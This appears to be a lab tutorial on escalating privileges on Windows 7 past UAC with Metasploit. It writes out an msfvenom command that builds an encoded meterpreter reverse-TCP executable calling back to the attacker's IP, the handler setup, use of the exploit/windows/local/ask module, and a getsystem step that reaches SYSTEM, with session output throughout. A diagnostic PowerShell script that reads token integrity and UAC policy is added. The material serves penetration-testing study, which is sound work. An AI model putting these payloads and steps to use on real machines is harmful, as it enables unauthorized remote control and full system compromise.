Preparation

Target | Attacker |
---|---|
win7 | kali |
192.168.43.254 | 192.168.43.113 |

Here I only demonstrate the attack itself. If any of the commands are unfamiliar, see my other articles, where I keep dedicated notes on the commands, or search Baidu yourself.
UAC overview

UAC (User Account Control) is a technology Microsoft introduced in Windows Vista to improve system security. Before a user performs an operation that could affect how the computer runs, or changes settings that affect other users, UAC requires the user to confirm the action or supply an administrator password.

In other words, once the user approves an application through the UAC prompt, that process runs with the full (high-integrity) administrator token rather than the filtered token an administrator normally logs on with. If we can hijack a program the user has already approved through UAC, our own code is elevated along with it, and that is the privilege escalation this article demonstrates.
Initial demonstration

Since this is a demonstration, we simply generate a payload with msfvenom to get a shell:

```shell
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.113 LPORT=6666 -b "\x00" -e x86/shikata_ga_nai -f exe > uac.exe
```

Set up the listener, choose the payload, and set the IP and port to listen on:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.113
set lport 6666
```

Then run it. On the Windows 7 machine, double-click uac.exe, and Kali receives the shell:

```
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.113:6666
[*] Sending stage (179779 bytes) to 192.168.43.254
[*] Meterpreter session 1 opened (192.168.43.113:6666 -> 192.168.43.254:50063) at 2020-10-05 22:02:08 +0800
meterpreter >
```
getuid shows the session is running as the Administrator account. As the failed getsystem below shows, however, this is the UAC-filtered (medium-integrity) token that an administrator normally runs with, not the elevated one:

```
meterpreter > getuid
Server username: LS--20200725FKO\Administrator
```

getsystem fails from this session, so we background it:

```
meterpreter > background
[*] Backgrounding session 2...
```
```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  2         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:50080 (192.168.43.254)
```
UAC privilege escalation

With the session in the background, use the following module:

```
use exploit/windows/local/ask
```

Look at the module info, then set the options we need:
```
msf5 exploit(windows/local/ask) > info

       Name: Windows Escalate UAC Execute RunAs
     Module: exploit/windows/local/ask
   Platform: Windows
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-01-03

Provided by:
  mubix <mubix@hak5.org>
  b00stfr3ak

Available targets:
  Id  Name
  --  ----
  0   Windows

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILENAME                    no        File name on disk
  PATH                        no        Location on disk, %TEMP% used if not set
  SESSION                     yes       The session to run this module on.
  TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)

Payload information:

Description:
  This module will attempt to elevate execution level using the
  ShellExecute undocumented RunAs flag to bypass low UAC settings.
```
From the output above, the only required option is SESSION:

```
msf5 exploit(windows/local/ask) > set session 2
session => 2
```

FILENAME and PATH are optional; set them or leave the defaults. Then run. This module does not bypass the prompt: it asks Windows to run the payload elevated, so a UAC consent dialog appears on the Windows 7 desktop, and the new session only arrives once the user clicks Yes.
```
msf5 exploit(windows/local/ask) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  5         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
  6         meterpreter x86/windows  LS--20200725FKO\Administrator @ LS--20200725FKO  192.168.43.113:6666 -> 192.168.43.254:49187 (192.168.43.254)
```
There are now two sessions, and both report the same Administrator account. That is expected: UAC does not change which user you are, only the integrity level of the token, so getuid cannot tell the two apart. The difference shows when we try getsystem in the new session:

```
msf5 exploit(windows/local/ask) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

We now have SYSTEM privileges: the elevated session carries the full administrator token, so the named-pipe impersonation that failed from the filtered session succeeds here.
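To see why two sessions with the same getuid behave so differently, it helps to look at the token itself from inside Windows. The PowerShell below is an added example written for this article; it is not part of the original post and not code from the Metasploit module. It assumes you run it on the Windows 7 target inside each meterpreter session (for example with `execute -f powershell.exe -i -H`, or via `shell`), and it assumes the standard UAC policy values under HKLM (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop). It reports the token's integrity label, whether BUILTIN\Administrators is present only as a deny-only group (the mark of a UAC-filtered token), and what the machine's UAC policy means for the `ask` module, whose RunAs request is approved without any click only when ConsentPromptBehaviorAdmin is 0.

```powershell
# Added example for this article (not from the original post or from Metasploit).
# Run it in both meterpreter sessions: the account is the same, the token is not.

function Get-TokenElevationInfo {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)

    # The integrity label is carried in the token as an S-1-16-<RID> group SID.
    # 0x1000 Low, 0x2000 Medium (UAC-filtered admin), 0x3000 High (elevated), 0x4000 System.
    $labelSid = $identity.Groups | Where-Object { $_.Value -like 'S-1-16-*' } | Select-Object -First 1
    $rid = if ($labelSid) { [int](($labelSid.Value -split '-')[-1]) } else { -1 }
    $integrity = switch ($rid) {
        { $_ -ge 0x4000 } { 'System'; break }
        { $_ -ge 0x3000 } { 'High (elevated)'; break }
        { $_ -ge 0x2000 } { 'Medium (UAC-filtered)'; break }
        { $_ -ge 0x1000 } { 'Low'; break }
        default           { 'Unknown' }
    }

    # A filtered token still lists BUILTIN\Administrators (S-1-5-32-544), but
    # flagged "Group used for deny only" (what `whoami /groups` prints).
    # IsInRole() ignores deny-only groups, so it tells you whether admin rights
    # are actually usable from this token.
    $adminListed    = [bool]($identity.Groups | Where-Object { $_.Value -eq 'S-1-5-32-544' })
    $adminEffective = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

    [PSCustomObject]@{
        User              = $identity.Name
        Integrity         = $integrity
        AdminGroupInToken = $adminListed
        AdminEffective    = $adminEffective
        # getsystem's named-pipe impersonation needs a real (high-integrity) admin token.
        GetsystemLikely   = $adminEffective -and ($rid -ge 0x3000)
    }
}

function Get-UacPolicy {
    # UAC policy lives under HKLM; reading it does not require elevation.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key -ErrorAction Stop

    # Documented meanings of ConsentPromptBehaviorAdmin for members of Administrators.
    $behavior = @{
        0 = 'Elevate without prompting (RunAs requests such as exploit/windows/local/ask need no click)'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }
    # If the value is absent, Windows applies the default behaviour (5).
    $cpba = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $lua  = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }

    [PSCustomObject]@{
        EnableLUA                  = $lua
        ConsentPromptBehaviorAdmin = $cpba
        Meaning                    = $behavior[$cpba]
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        # With UAC on and any prompting behaviour, the victim must click Yes for 'ask' to work.
        UserClickNeededForAsk      = ($lua -eq 1) -and ($cpba -ne 0)
    }
}

Get-TokenElevationInfo | Format-List
Get-UacPolicy | Format-List
```

In the filtered session (the one where getsystem fails) expect Integrity to be Medium and AdminEffective to be False even though AdminGroupInToken is True; in the session opened by `ask`, expect High and True. UserClickNeededForAsk being True is the reason the module is listed below as "requires clicking".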
Module name | My understanding |
---|---|
exploit/windows/local/ask | requires the user to click through the UAC prompt |
exploit/windows/local/bypassuac | no click required |
exploit/windows/local/ms14_058_track_popup_menu | |